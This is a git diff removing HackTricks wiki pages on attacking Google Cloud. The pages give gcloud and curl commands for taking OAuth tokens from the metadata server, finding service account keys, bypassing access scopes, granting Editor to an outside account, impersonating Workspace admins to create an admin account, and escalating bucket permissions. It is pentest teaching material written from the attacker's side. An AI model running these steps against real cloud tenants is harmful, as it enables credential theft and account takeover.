-**You can find a** [**list of all the granular permissions here**](https://cloud.google.com/iam/docs/custom-roles-permissions-support)**.**
-
-#### Basic roles
-
-| Name | Title | Permissions |
-| ---------------- | ------ | -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
-| **roles/viewer** | Viewer | Permissions for **read-only actions** that do not affect state, such as viewing (but not modifying) existing resources or data. |
-| **roles/editor** | Editor | All **viewer permissions**, **plus** permissions for actions that modify state, such as changing existing resources. |
-| **roles/owner** | Owner |
All Editor permissions and permissions for the following actions:
Manage roles and permissions for a project and all resources within the project.
Set up billing for a project.
|
-
-You can try the following command to specifically **enumerate roles assigned to your service account** project-wide in the current project:
-
-```bash
-PROJECT=$(curl http://metadata.google.internal/computeMetadata/v1/project/project-id \
- -H "Metadata-Flavor: Google" -s)
-ACCOUNT=$(curl http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/email \
- -H "Metadata-Flavor: Google" -s)
-gcloud projects get-iam-policy $PROJECT \
- --flatten="bindings[].members" \
- --format='table(bindings.role)' \
- --filter="bindings.members:$ACCOUNT"
-```
-
-Don't worry too much if you get denied access to the command above. It's still possible to work out what you can do simply by trying to do it.
-
-More generally, you can shorten the command to the following to get an idea of the **roles assigned project-wide to all members**.
-
-```
-gcloud projects get-iam-policy [PROJECT-ID]
-```
-
-Or to see the IAM policy [assigned to a single Compute Instance](https://cloud.google.com/sdk/gcloud/reference/compute/instances/get-iam-policy) you can try the following.
-
-```
-gcloud compute instances get-iam-policy [INSTANCE] --zone [ZONE]
-```
-
-### **Organization Policies**
-
-The IAM policies indicates the permissions principals has over resources via roles which ara assigned granular permissions. Organization policies **restrict how those service can be used or which features are enabled disabled**. This helps in order to improve the least privilege of each resource in the gcp environment.
-
-### **Terraform IAM Policies, Bindings and Memberships**
-
-As defined by terraform in [https://registry.terraform.io/providers/hashicorp/google/latest/docs/resources/google\_project\_iam](https://registry.terraform.io/providers/hashicorp/google/latest/docs/resources/google\_project\_iam) using terraform with GCP there are different ways to grant a principal access over a resource:
-
-* **Memberships**: You set **principals as members of roles** **without restrictions** over the role or the principals. You can put a user as a member of a role and then put a group as a member of the same role and also set those principals (user and group) as member of other roles.
-* **Bindings**: Several **principals can be binded to a role**. Those **principals can still be binded or be members of other roles**. However, if a principal which isnβt binded to the role is set as **member of a binded role**, the next time the **binding is applied, the membership will disappear**.
-* **Policies**: A policy is **authoritative**, it indicates roles and principals and then, **those principals cannot have more roles and those roles cannot have more principals** unless that policy is modified (not even in other policies, bindings or memberships). Therefore, when a role or principal is specified in policy all its privileges are **limited by that policy**. Obviously, this can be bypassed in case the principal is given the option to modify the policy or privilege escalation permissions (like create a new principal and bind him a new role).
-
-### **Service accounts**
-
-Virtual machine instances are usually **assigned a service account**. Every GCP project has a [default service account](https://cloud.google.com/compute/docs/access/service-accounts#default\_service\_account), and this will be assigned to new Compute Instances unless otherwise specified. Administrators can choose to use either a custom account or no account at all. This service account **can be used by any user or application on the machine** to communicate with the Google APIs. You can run the following command to see what accounts are available to you:
-
-```
-gcloud auth list
-```
-
-**Default service accounts will look like** one of the following:
-
-```
-PROJECT_NUMBER-compute@developer.gserviceaccount.com
-PROJECT_ID@appspot.gserviceaccount.com
-```
-
-A **custom service account** will look like this:
-
-```
-SERVICE_ACCOUNT_NAME@PROJECT_NAME.iam.gserviceaccount.com
-```
-
-If `gcloud auth list` returns **multiple** accounts **available**, something interesting is going on. You should generally see only the service account. If there is more than one, you can cycle through each using `gcloud config set account [ACCOUNT]` while trying the various tasks in this blog.
-
-### **Access scopes**
-
-The **service account** on a GCP Compute Instance will **use** **OAuth** to communicate with the Google Cloud APIs. When [access scopes](https://cloud.google.com/compute/docs/access/service-accounts#accesscopesiam) are used, the OAuth token that is generated for the instance will **have a** [**scope**](https://oauth.net/2/scope/) **limitation included**. This defines **what API endpoints it can authenticate to**. It does **NOT define the actual permissions**.
-
-When using a **custom service account**, Google [recommends](https://cloud.google.com/compute/docs/access/service-accounts#service\_account\_permissions) that access scopes are not used and to **rely totally on IAM**. The web management portal actually enforces this, but access scopes can still be applied to instances using custom service accounts programatically.
-
-There are three options when setting an access scope on a VM instance:
-
-* Allow default access
-* All full access to all cloud APIs
-* Set access for each API
-
-You can see what **scopes** are **assigned** by **querying** the **metadata** URL. Here is an example from a VM with "default" access assigned:
-
-```
-$ curl http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/scopes \
- -H 'Metadata-Flavor:Google'
-
-https://www.googleapis.com/auth/devstorage.read_only
-https://www.googleapis.com/auth/logging.write
-https://www.googleapis.com/auth/monitoring.write
-https://www.googleapis.com/auth/servicecontrol
-https://www.googleapis.com/auth/service.management.readonly
-https://www.googleapis.com/auth/trace.append
-```
-
-The most interesting thing in the **default** **scope** is **`devstorage.read_only`**. This grants read access to all storage buckets in the project. This can be devastating, which of course is great for us as an attacker.
-
-Here is what you'll see from an instance with **no scope limitations**:
-
-```
-curl http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/scopes -H 'Metadata-Flavor:Google'
-https://www.googleapis.com/auth/cloud-platform
-```
-
-This `cloud-platform` scope is what we are really hoping for, as it will allow us to authenticate to any API function and leverage the full power of our assigned IAM permissions.
-
-It is possible to encounter some **conflicts** when using both **IAM and access scopes**. For example, your service account may have the IAM role of `compute.instanceAdmin` but the instance you've breached has been crippled with the scope limitation of `https://www.googleapis.com/auth/compute.readonly`. This would prevent you from making any changes using the OAuth token that's automatically assigned to your instance.
-
-### Default credentials
-
-**Default service account token**
-
-The **metadata server** available to a given instance will **provide** any user/process **on that instance** with an **OAuth token** that is automatically used as the **default credentials** when communicating with Google APIs via the `gcloud` command.
-
-You can retrieve and inspect the token with the following curl command:
-
-```bash
-curl "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token" \
- -H "Metadata-Flavor: Google"
-```
-
-Which will receive a response like the following:
-
-```json
-{
- "access_token":"ya29.AHES6ZRN3-HlhAPya30GnW_bHSb_QtAS08i85nHq39HE3C2LTrCARA",
- "expires_in":3599,
- "token_type":"Bearer"
- }
-```
-
-This token is the **combination of the service account and access scopes** assigned to the Compute Instance. So, even though your service account may have **every IAM privilege** imaginable, this particular OAuth token **might be limited** in the APIs it can communicate with due to **access scopes**.
-
-**Application default credentials**
-
-When using one of Google's official GCP client libraries, the code will automatically go **searching for credentials** following a strategy called [Application Default Credentials](https://cloud.google.com/docs/authentication/production).
-
-1. First, it will check would be the [**source code itself**](https://cloud.google.com/docs/authentication/production#passing\_the\_path\_to\_the\_service\_account\_key\_in\_code). Developers can choose to statically point to a service account key file.
-2. The next is an **environment variable called `GOOGLE_APPLICATION_CREDENTIALS`**. This can be set to point to a **service account key file**.
-3. Finally, if neither of these are provided, the application will revert to using the **default token provided by the metadata server** as described in the section above.
-
-Finding the actual **JSON file with the service account credentials** is generally much **more** **desirable** than **relying on the OAuth token** on the metadata server. This is because the raw service account credentials can be activated **without the burden of access scopes** and without the short expiration period usually applied to the tokens.
-
-### **Networking**
-
-Compute Instances are connected to networks called VPCs or [Virtual Private Clouds](https://cloud.google.com/vpc/docs/vpc). [GCP firewall](https://cloud.google.com/vpc/docs/firewalls) rules are defined at this network level but are applied individually to a Compute Instance. Every network, by default, has two [implied firewall rules](https://cloud.google.com/vpc/docs/firewalls#default\_firewall\_rules): allow outbound and deny inbound.
-
-Each GCP project is provided with a VPC called `default`, which applies the following rules to all instances:
-
-* default-allow-internal (allow all traffic from other instances on the `default` network)
-* default-allow-ssh (allow 22 from everywhere)
-* default-allow-rdp (allow 3389 from everywhere)
-* default-allow-icmp (allow ping from everywhere)
-
-**Meet the neighbors**
-
-Firewall rules may be more permissive for internal IP addresses. This is especially true for the default VPC, which permits all traffic between Compute Instances.
-
-You can get a nice readable view of all the subnets in the current project with the following command:
-
-```
-gcloud compute networks subnets list
-```
-
-And an overview of all the internal/external IP addresses of the Compute Instances using the following:
-
-```
-gcloud compute instances list
-```
-
-If you go crazy with nmap from a Compute Instance, Google will notice and will likely send an alert email to the project owner. This is more likely to happen if you are scanning public IP addresses outside of your current project. Tread carefully.
-
-**Enumerating public ports**
-
-Perhaps you've been unable to leverage your current access to move through the project internally, but you DO have read access to the compute API. It's worth enumerating all the instances with firewall ports open to the world - you might find an insecure application to breach and hope you land in a more powerful position.
-
-In the section above, you've gathered a list of all the public IP addresses. You could run nmap against them all, but this may taken ages and could get your source IP blocked.
-
-When attacking from the internet, the default rules don't provide any quick wins on properly configured machines. It's worth checking for password authentication on SSH and weak passwords on RDP, of course, but that's a given.
-
-What we are really interested in is other firewall rules that have been intentionally applied to an instance. If we're lucky, we'll stumble over an insecure application, an admin interface with a default password, or anything else we can exploit.
-
-[Firewall rules](https://cloud.google.com/vpc/docs/firewalls) can be applied to instances via the following methods:
-
-* [Network tags](https://cloud.google.com/vpc/docs/add-remove-network-tags)
-* [Service accounts](https://cloud.google.com/vpc/docs/firewalls#serviceaccounts)
-* All instances within a VPC
-
-Unfortunately, there isn't a simple `gcloud` command to spit out all Compute Instances with open ports on the internet. You have to connect the dots between firewall rules, network tags, services accounts, and instances.
-
-We've automated this completely using [this python script](https://gitlab.com/gitlab-com/gl-security/gl-redteam/gcp\_firewall\_enum) which will export the following:
-
-* CSV file showing instance, public IP, allowed TCP, allowed UDP
-* nmap scan to target all instances on ports ingress allowed from the public internet (0.0.0.0/0)
-* masscan to target the full TCP range of those instances that allow ALL TCP ports from the public internet (0.0.0.0/0)
-
-## Enumeration
-
-### Automatic Tools
-
-* [**https://github.com/carlospolop/purplepanda**](https://github.com/carlospolop/purplepanda): Python script to enumerate resources and find privesc paths
-* [https://gitlab.com/gitlab-com/gl-security/security-operations/gl-redteam/gcp\_enum:](https://gitlab.com/gitlab-com/gl-security/security-operations/gl-redteam/gcp\_enum) Bash script to enumerate a GCP environment using gcloud cli and saving the results in
-* [https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation:](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation) Scripts to enumerate high IAM privileges and to escalate privileges in GCP abusing them (I couldnβt make run the enumerate script)
-* [https://github.com/lyft/cartography:](https://github.com/lyft/cartography) Tool to enumerate and print in a graph resources and relations of different cloud platforms
-* [https://github.com/RyanJarv/awesome-cloud-sec:](https://github.com/RyanJarv/awesome-cloud-sec) This is a list of cloud security tools
-
-### IAM
-
-| Description | Command |
-| ---------------------------------------------------------------------------------------------------------------------------------- | ------------------------------------------------------------------------------------------------ |
-| List **roles** | `gcloud iam roles list --filter='etag:AA=='` |
-| Get **description** and permissions of a role | gcloud iam roles describe roles/container.admin |
-| Get iam **policy** of a **organisation** | `gcloud organizations get-iam-policy` |
-| Get iam **policy** of a **project** | `gcloud projects get-iam-policy ` |
-| Get iam **policy** of a **folder** | `gcloud resource-manager folders get-iam-policy` |
-| Get **members** of a **group** | `gcloud identity groups memberships search-transitive-memberships --group-email=email@group.com` |
-| Get **permissions** of a **role** | `gcloud iam roles describe roles/accessapproval.approver` |
-| [**Testable permissions**](https://cloud.google.com/iam/docs/reference/rest/v1/permissions/queryTestablePermissions) on a resource | `gcloud iam list-testable-permissions --filter "NOT apiDisabled: true` |
-| List of **grantable** **roles** for a resource | `gcloud iam list-grantable-roles ` |
-| List **custom** **roles** on a project | `gcloud iam roles list --project $PROJECT_ID` |
-| List **service accounts** | `gcloud iam service-accounts list` |
-
-## Unauthenticated Attacks
-
-{% content-ref url="gcp-buckets-brute-force-and-privilege-escalation.md" %}
-[gcp-buckets-brute-force-and-privilege-escalation.md](gcp-buckets-brute-force-and-privilege-escalation.md)
-{% endcontent-ref %}
-
-#### Phishing
-
-You could **OAuth phish** a user with high privileges.
-
-#### Dorks
-
-* **Github**: auth\_provider\_x509\_cert\_url extension:json
-
-## Generic GCP Security Checklists
-
-* [Google Cloud Computing Platform CIS Benchmark](https://www.cisecurity.org/cis-benchmarks/)
-* [https://github.com/doitintl/secure-gcp-reference](https://github.com/doitintl/secure-gcp-reference)
-
-## Local Privilege Escalation / SSH Pivoting
-
-Supposing that you have compromised a VM in GCP, there are some **GCP privileges** that can allow you to **escalate privileges locally, into other machines and also pivot to other VMs**:
-
-{% content-ref url="gcp-local-privilege-escalation-ssh-pivoting.md" %}
-[gcp-local-privilege-escalation-ssh-pivoting.md](gcp-local-privilege-escalation-ssh-pivoting.md)
-{% endcontent-ref %}
-
-If you have found some [**SSRF vulnerability in a GCP environment check this page**](../../pentesting-web/ssrf-server-side-request-forgery/#6440).
-
-## GCP Post Exploitation
-
-### GCP Interesting Permissions
-
-The most common way once you have obtained some cloud credentials of has compromised some service running inside a cloud is to **abuse miss-configured privileges** the compromised account may have. So, the first thing you should do is to enumerate your privileges.
-
-Moreover, during this enumeration, remember that **permissions can be set at the highest level of "Organization"** as well.
-
-{% content-ref url="gcp-interesting-permissions/" %}
-[gcp-interesting-permissions](gcp-interesting-permissions/)
-{% endcontent-ref %}
-
-### Bypassing access scopes
-
-When [access scopes](https://cloud.google.com/compute/docs/access/service-accounts#accesscopesiam) are used, the OAuth token that is generated for the computing instance (VM) will **have a** [**scope**](https://oauth.net/2/scope/) **limitation included**. However, you might be able to **bypass** this limitation and exploit the permissions the compromised account has.
-
-The **best way to bypass** this restriction is either to **find new credentials** in the compromised host, to **find the service key to generate an OUATH token** without restriction or to **jump to a different VM less restricted**.
-
-**Pop another box**
-
-It's possible that another box in the environment exists with less restrictive access scopes. If you can view the output of `gcloud compute instances list --quiet --format=json`, look for instances with either the specific scope you want or the **`auth/cloud-platform`** all-inclusive scope.
-
-Also keep an eye out for instances that have the default service account assigned (`PROJECT_NUMBER-compute@developer.gserviceaccount.com`).
-
-**Find service account keys**
-
-Google states very clearly [**"Access scopes are not a security mechanism⦠they have no effect when making requests not authenticated through OAuth"**](https://cloud.google.com/compute/docs/access/service-accounts#accesscopesiam).
-
-Therefore, if you **find a** [**service account key**](https://cloud.google.com/iam/docs/creating-managing-service-account-keys) stored on the instance you can bypass the limitation. These are **RSA private keys** that can be used to authenticate to the Google Cloud API and **request a new OAuth token with no scope limitations**.
-
-Check if any service account has exported a key at some point with:
-
-```bash
-for i in $(gcloud iam service-accounts list --format="table[no-heading](email)"); do
- echo Looking for keys for $i:
- gcloud iam service-accounts keys list --iam-account $i
-done
-```
-
-These files are **not stored on a Compute Instance by default**, so you'd have to be lucky to encounter them. The default name for the file is `[project-id]-[portion-of-key-id].json`. So, if your project name is `test-project` then you can **search the filesystem for `test-project*.json`** looking for this key file.
-
-The contents of the file look something like this:
-
-```json
-{
-"type": "service_account",
-"project_id": "[PROJECT-ID]",
-"private_key_id": "[KEY-ID]",
-"private_key": "-----BEGIN PRIVATE KEY-----\n[PRIVATE-KEY]\n-----END PRIVATE KEY-----\n",
-"client_email": "[SERVICE-ACCOUNT-EMAIL]",
-"client_id": "[CLIENT-ID]",
-"auth_uri": "https://accounts.google.com/o/oauth2/auth",
-"token_uri": "https://accounts.google.com/o/oauth2/token",
-"auth_provider_x509_cert_url": "https://www.googleapis.com/oauth2/v1/certs",
-"client_x509_cert_url": "https://www.googleapis.com/robot/v1/metadata/x509/[SERVICE-ACCOUNT-EMAIL]"
-}
-```
-
-Or, if **generated from the CLI** they will look like this:
-
-```json
-{
-"name": "projects/[PROJECT-ID]/serviceAccounts/[SERVICE-ACCOUNT-EMAIL]/keys/[KEY-ID]",
-"privateKeyType": "TYPE_GOOGLE_CREDENTIALS_FILE",
-"privateKeyData": "[PRIVATE-KEY]",
-"validAfterTime": "[DATE]",
-"validBeforeTime": "[DATE]",
-"keyAlgorithm": "KEY_ALG_RSA_2048"
-}
-```
-
-If you do find one of these files, you can tell the **`gcloud` command to re-authenticate** with this service account. You can do this on the instance, or on any machine that has the tools installed.
-
-```bash
-gcloud auth activate-service-account --key-file [FILE]
-```
-
-You can now **test your new OAuth token** as follows:
-
-```bash
-TOKEN=`gcloud auth print-access-token`
-curl https://www.googleapis.com/oauth2/v1/tokeninfo?access_token=$TOKEN
-```
-
-You should see `https://www.googleapis.com/auth/cloud-platform` listed in the scopes, which means you are **not limited by any instance-level access scopes**. You now have full power to use all of your assigned IAM permissions.
-
-### Service account impersonation
-
-Impersonating a service account can be very useful to **obtain new and better privileges**.
-
-There are three ways in which you can [impersonate another service account](https://cloud.google.com/iam/docs/understanding-service-accounts#impersonating\_a\_service\_account):
-
-* Authentication **using RSA private keys** (covered [above](./#bypassing-access-scopes))
-* Authorization **using Cloud IAM policies** (covered [here](broken-reference/))
-* **Deploying jobs on GCP services** (more applicable to the compromise of a user account)
-
-### Granting access to management console
-
-Access to the [GCP management console](https://console.cloud.google.com) is **provided to user accounts, not service accounts**. To log in to the web interface, you can **grant access to a Google account** that you control. This can be a generic "**@gmail.com**" account, it does **not have to be a member of the target organization**.
-
-To **grant** the primitive role of **Owner** to a generic "@gmail.com" account, though, you'll need to **use the web console**. `gcloud` will error out if you try to grant it a permission above Editor.
-
-You can use the following command to **grant a user the primitive role of Editor** to your existing project:
-
-```bash
-gcloud projects add-iam-policy-binding [PROJECT] --member user:[EMAIL] --role roles/editor
-```
-
-If you succeeded here, try **accessing the web interface** and exploring from there.
-
-This is the **highest level you can assign using the gcloud tool**.
-
-### Spreading to Workspace via domain-wide delegation of authority
-
-[**Workspace**](https://gsuite.google.com) is Google's c**ollaboration and productivity platform** which consists of things like Gmail, Google Calendar, Google Drive, Google Docs, etc.
-
-**Service accounts** in GCP can be granted the **rights to programatically access user data** in Workspace by impersonating legitimate users. This is known as [domain-wide delegation](https://developers.google.com/admin-sdk/reports/v1/guides/delegation). This includes actions like **reading** **email** in GMail, accessing Google Docs, and even creating new user accounts in the G Suite organization.
-
-Workspace has [its own API](https://developers.google.com/gsuite/aspects/apis), completely separate from GCP. Permissions are granted to Workspace and **there isn't any default relation between GCP and Workspace**.
-
-However, it's possible to **give** a service account **permissions** over a Workspace user. If you have access to the Web UI at this point, you can browse to **IAM -> Service Accounts** and see if any of the accounts have **"Enabled" listed under the "domain-wide delegation" column**. The column itself may **not appear if no accounts are enabled** (you can read the details of each service account to confirm this). As of this writing, there is no way to do this programatically, although there is a [request for this feature](https://issuetracker.google.com/issues/116182848) in Google's bug tracker.
-
-To create this relation it's needed to **enable it in GCP and also in Workforce**.
-
-#### Test Workspace access
-
-To test this access you'll need the **service account credentials exported in JSON** format. You may have acquired these in an earlier step, or you may have the access required now to create a key for a service account you know to have domain-wide delegation enabled.
-
-This topic is a bit tricky⦠your service account has something called a "client\_email" which you can see in the JSON credential file you export. It probably looks something like `account-name@project-name.iam.gserviceaccount.com`. If you try to access Workforce API calls directly with that email, even with delegation enabled, you will fail. This is because the Workforce directory will not include the GCP service account's email addresses. Instead, to interact with Workforce, we need to actually impersonate valid Workforce users.
-
-What you really want to do is to **impersonate a user with administrative access**, and then use that access to do something like **reset a password, disable multi-factor authentication, or just create yourself a shiny new admin account**.
-
-Gitlab've created [this Python script](https://gitlab.com/gitlab-com/gl-security/gl-redteam/gcp\_misc/blob/master/gcp\_delegation.py) that can do two things - list the user directory and create a new administrative account. Here is how you would use it:
-
-```bash
-# Validate access only
-./gcp_delegation.py --keyfile ./credentials.json \
- --impersonate steve.admin@target-org.com \
- --domain target-org.com
-
-# List the directory
-./gcp_delegation.py --keyfile ./credentials.json \
- --impersonate steve.admin@target-org.com \
- --domain target-org.com \
- --list
-
-# Create a new admin account
-./gcp_delegation.py --keyfile ./credentials.json \
- --impersonate steve.admin@target-org.com \
- --domain target-org.com \
- --account pwned
-```
-
-You can try this script across a range of email addresses to impersonate **various** **users**. Standard output will indicate whether or not the service account has access to Workforce, and will include a **random password for the new admin accoun**t if one is created.
-
-If you have success creating a new admin account, you can log on to the [Google admin console](https://admin.google.com) and have full control over everything in G Suite for every user - email, docs, calendar, etc. Go wild.
-
-### Looting
-
-Another promising way to **escalate privileges inside the cloud is to enumerate as much sensitive information as possible** from the services that are being used. Here you can find some enumeration recommendations for some GCP services, but more could be used so feel free to submit PRs indicating ways to enumerate more services:
-
-{% hint style="info" %}
-Note that you can enumerate most resources with `list` (list items of that type), `describe` (describe parent and children items) and `get-iam-policy` (get policy attached to that specific resource).
-{% endhint %}
-
-There is a gcloud API endpoint that aims to **list all the resources the accessible from the used user accoun**t, it's in alpha bet and only supports a couple of resources, but maybe in the future you can list all you have access to with it: [https://helpmanual.io/man1/gcloud\_alpha\_resources\_list/](https://helpmanual.io/man1/gcloud\_alpha\_resources\_list/)
-
-{% content-ref url="gcp-buckets-enumeration.md" %}
-[gcp-buckets-enumeration.md](gcp-buckets-enumeration.md)
-{% endcontent-ref %}
-
-{% content-ref url="gcp-compute-enumeration.md" %}
-[gcp-compute-enumeration.md](gcp-compute-enumeration.md)
-{% endcontent-ref %}
-
-{% content-ref url="gcp-network-enumeration.md" %}
-[gcp-network-enumeration.md](gcp-network-enumeration.md)
-{% endcontent-ref %}
-
-{% content-ref url="gcp-kms-and-secrets-management-enumeration.md" %}
-[gcp-kms-and-secrets-management-enumeration.md](gcp-kms-and-secrets-management-enumeration.md)
-{% endcontent-ref %}
-
-{% content-ref url="gcp-databases-enumeration.md" %}
-[gcp-databases-enumeration.md](gcp-databases-enumeration.md)
-{% endcontent-ref %}
-
-{% content-ref url="gcp-serverless-code-exec-services-enumeration.md" %}
-[gcp-serverless-code-exec-services-enumeration.md](gcp-serverless-code-exec-services-enumeration.md)
-{% endcontent-ref %}
-
-{% content-ref url="gcp-looting.md" %}
-[gcp-looting.md](gcp-looting.md)
-{% endcontent-ref %}
-
-### Persistance
-
-{% content-ref url="gcp-persistance.md" %}
-[gcp-persistance.md](gcp-persistance.md)
-{% endcontent-ref %}
-
-## Capture gcloud, gsutil... network
-
-```bash
-gcloud config set proxy/address 127.0.0.1
-gcloud config set proxy/port 8080
-gcloud config set proxy/type http
-gcloud config set auth/disable_ssl_validation True
-
-# If you don't want to completely disable ssl_validation use:
-gcloud config set core/custom_ca_certs_file cert.pem
-
-# Back to normal
-gcloud config unset proxy/address
-gcloud config unset proxy/port
-gcloud config unset proxy/type
-gcloud config unset auth/disable_ssl_validation
-gcloud config unset core/custom_ca_certs_file
-```
-
-## References
-
-* [https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/](https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/)
-
-
-
-Support HackTricks and get benefits!
-
-- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-
-- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-
-- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-
-- **Join the** [**π¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**π¦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
-
-- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
-
-
diff --git a/cloud-security/gcp-security/gcp-buckets-brute-force-and-privilege-escalation.md b/cloud-security/gcp-security/gcp-buckets-brute-force-and-privilege-escalation.md
deleted file mode 100644
index a95a44ad6..000000000
--- a/cloud-security/gcp-security/gcp-buckets-brute-force-and-privilege-escalation.md
+++ /dev/null
@@ -1,76 +0,0 @@
-# GCP - Buckets: Public Assets Brute-Force & Discovery, & Buckets Privilege Escalation
-
-## GCP - Buckets: Public Assets Brute-Force & Discovery, & Buckets Privilege Escalation
-
-
-
-Support HackTricks and get benefits!
-
-* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* **Join the** [**π¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**π¦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
-* **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
-
-
-
-## Public Assets Discovery
-
-One way to discover public cloud resources that belongs to a company is to scrape their webs looking for them. Tools like [**CloudScraper**](https://github.com/jordanpotti/CloudScraper) will scrape the web an search for **links to public cloud resources** (in this case this tools searches `['amazonaws.com', 'digitaloceanspaces.com', 'windows.net', 'storage.googleapis.com', 'aliyuncs.com']`)
-
-Note that other cloud resources could be searched for and that some times these resources are hidden behind **subdomains that are pointing them via CNAME registry**.
-
-## Public Resources Brute-Force
-
-### Buckets, Firebase, Apps & Cloud Functions
-
-* [https://github.com/initstring/cloud\_enum](https://github.com/initstring/cloud\_enum): This tool in GCP brute-force Buckets, Firebase Realtime Databases, Google App Engine sites, and Cloud Functions
-* [https://github.com/0xsha/CloudBrute](https://github.com/0xsha/CloudBrute): This tool in GCP brute-force Buckets and Apps.
-
-### Buckets
-
-As other clouds, GCP also offers Buckets to its users. These buckets might be (to list the content, read, write...).
-
-![](<../../.gitbook/assets/image (618) (3).png>)
-
-The following tools can be used to generate variations of the name given and search for miss-configured buckets with that names:
-
-* [https://github.com/RhinoSecurityLabs/GCPBucketBrute](https://github.com/RhinoSecurityLabs/GCPBucketBrute)
-
-## Privilege Escalation
-
-If the bucket policy allowed either βallUsersβ or βallAuthenticatedUsersβ to **write to their bucket policy** (the **storage.buckets.setIamPolicy** permission)**,** then anyone can modify the bucket policy and grant himself full access.
-
-### Check Permissions
-
-There are 2 ways to check the permissions over a bucket. The first one is to ask for them by making a request to `https://www.googleapis.com/storage/v1/b/BUCKET_NAME/iam` or running `gsutil iam get gs://BUCKET_NAME`.
-
-However, if your user (potentially belonging to allUsers or allAuthenticatedUsers") doesn't have permissions to read the iam policy of the bucket (storage.buckets.getIamPolicy), that won't work.
-
-The other option which will always work is to use the testPermissions endpoint of the bucket to figure out if you have the specified permission, for example accessing: `https://www.googleapis.com/storage/v1/b/BUCKET_NAME/iam/testPermissions?permissions=storage.buckets.delete&permissions=storage.buckets.get&permissions=storage.buckets.getIamPolicy&permissions=storage.buckets.setIamPolicy&permissions=storage.buckets.update&permissions=storage.objects.create&permissions=storage.objects.delete&permissions=storage.objects.get&permissions=storage.objects.list&permissions=storage.objects.update`
-
-### Escalating
-
-With the βgsutilβ Google Storage CLI program, we can run the following command to grant βallAuthenticatedUsersβ access to the βStorage Adminβ role, thus **escalating the privileges we were granted** to the bucket:
-
-```
-gsutil iam ch group:allAuthenticatedUsers:admin gs://BUCKET_NAME
-```
-
-One of the main attractions to escalating from a LegacyBucketOwner to Storage Admin is the ability to use the βstorage.buckets.deleteβ privilege. In theory, you could **delete the bucket after escalating your privileges, then you could create the bucket in your own account to steal the name**.
-
-## References
-
-* [https://rhinosecuritylabs.com/gcp/google-cloud-platform-gcp-bucket-enumeration/](https://rhinosecuritylabs.com/gcp/google-cloud-platform-gcp-bucket-enumeration/)
-
-
-
-Support HackTricks and get benefits!
-
-* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* **Join the** [**π¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**π¦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
-* **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
-
-
diff --git a/cloud-security/gcp-security/gcp-buckets-enumeration.md b/cloud-security/gcp-security/gcp-buckets-enumeration.md
deleted file mode 100644
index da44e3659..000000000
--- a/cloud-security/gcp-security/gcp-buckets-enumeration.md
+++ /dev/null
@@ -1,106 +0,0 @@
-
-
-
-
-Support HackTricks and get benefits!
-
-- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-
-- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-
-- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-
